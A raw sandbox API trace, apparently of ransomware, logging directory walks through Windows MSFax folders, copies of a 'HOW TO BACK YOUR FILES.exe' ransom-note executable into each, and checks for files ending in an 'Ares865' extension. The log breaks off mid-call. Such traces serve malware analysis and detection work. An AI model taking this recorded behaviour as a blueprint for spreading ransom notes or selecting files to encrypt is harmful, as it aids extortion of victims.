RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x335068 [0090.133] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0090.133] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0090.133] lstrcmpiW (lpString1="VirtualInbox", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.133] lstrcmpiW (lpString1="VirtualInbox", lpString2="aoldtz.exe") returned 1 [0090.133] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VirtualInbox" | out: lpString1="VirtualInbox") returned="VirtualInbox" [0090.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0090.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x335108 [0090.133] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0090.133] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0090.133] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.133] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0090.133] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0090.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0090.134] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.134] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\virtualinbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.134] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.134] GetLastError () returned 0x0 [0090.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.134] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.134] CloseHandle (hObject=0x120) returned 1 [0090.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.135] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.135] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.135] lstrcpyW (in: lpString1=0x2cce498, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0090.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0090.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2e27c0 [0090.135] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0090.135] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c362040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.135] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.135] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c362040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.135] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.135] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0090.135] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0090.135] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0090.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.136] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.136] GetLastError () returned 0x0 [0090.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.136] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.136] CloseHandle (hObject=0x120) returned 1 [0090.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.137] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x6366c580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6366c580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.137] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.137] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.137] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="WelcomeFax.tif.Ares865" | out: lpString1="WelcomeFax.tif.Ares865") returned="WelcomeFax.tif.Ares865" [0090.137] lstrlenW (lpString="WelcomeFax.tif.Ares865") returned 22 [0090.137] lstrlenW (lpString="Ares865") returned 7 [0090.137] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.137] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x6366c580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WelcomeFax.tif.Ares865", cAlternateFileName="")) returned 0 [0090.137] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.137] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0090.137] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" [0090.137] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" [0090.137] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.137] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\sentitems\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.138] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.138] GetLastError () returned 0x0 [0090.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.138] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.138] CloseHandle (hObject=0x120) returned 1 [0090.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.139] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.139] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.139] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.139] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" [0090.139] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" [0090.139] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.139] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\queue\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.140] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.140] GetLastError () returned 0x0 [0090.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.140] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.140] CloseHandle (hObject=0x120) returned 1 [0090.140] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.140] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.140] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.140] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.140] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" [0090.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox" [0090.141] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.141] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\inbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.141] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.141] GetLastError () returned 0x0 [0090.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.141] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.141] CloseHandle (hObject=0x120) returned 1 [0090.142] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.142] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.142] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.142] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0090.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0090.142] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.142] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\common coverpages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.143] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.143] GetLastError () returned 0x0 [0090.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.143] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.143] CloseHandle (hObject=0x120) returned 1 [0090.143] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.143] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.143] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.143] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.144] lstrcpyW (in: lpString1=0x2cce4a2, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0090.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xae) returned 0x2c8eb8 [0090.144] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.144] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.144] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.144] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.144] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.146] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.146] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0090.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0090.147] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.147] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.147] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.147] GetLastError () returned 0x0 [0090.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.147] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, 